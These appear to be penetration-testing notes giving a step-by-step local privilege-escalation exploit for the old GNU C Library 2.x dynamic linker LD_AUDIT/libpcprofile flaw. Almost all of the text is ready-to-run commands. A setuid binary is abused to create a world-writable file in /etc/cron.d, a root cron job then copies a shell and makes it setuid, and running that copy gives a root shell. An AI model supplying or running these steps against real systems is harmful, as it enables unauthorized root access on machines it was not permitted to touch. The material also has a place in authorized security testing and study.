GNU C Library

ldd --version

GNU C Library 2.x (libc6)

GNU C Library 2.x (libc6) has a privesc exploit:

GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege EscalationExploit Database

GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation

Enumeration

ldd --version

Exploitation

Step 1: The creation mask is inherited by children, and survives even a setuid execve. Therefore, we can influence how files are created during exploitation.

umask 0

Step 2: libpcprofile is distributed with the libc package.

dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so

Step 3: We identified one of the pcprofile constructors is unsafe to run with elevated privileges, as it creates the file specified in the output environment variable.

LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ls -l /etc/cron.d/exploit

Step 4: Setup a cronjob to give us privileges.

printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
ls -l /tmp/exploit

Step 5: Trigger the exploit and get a root shell.

/tmp/exploit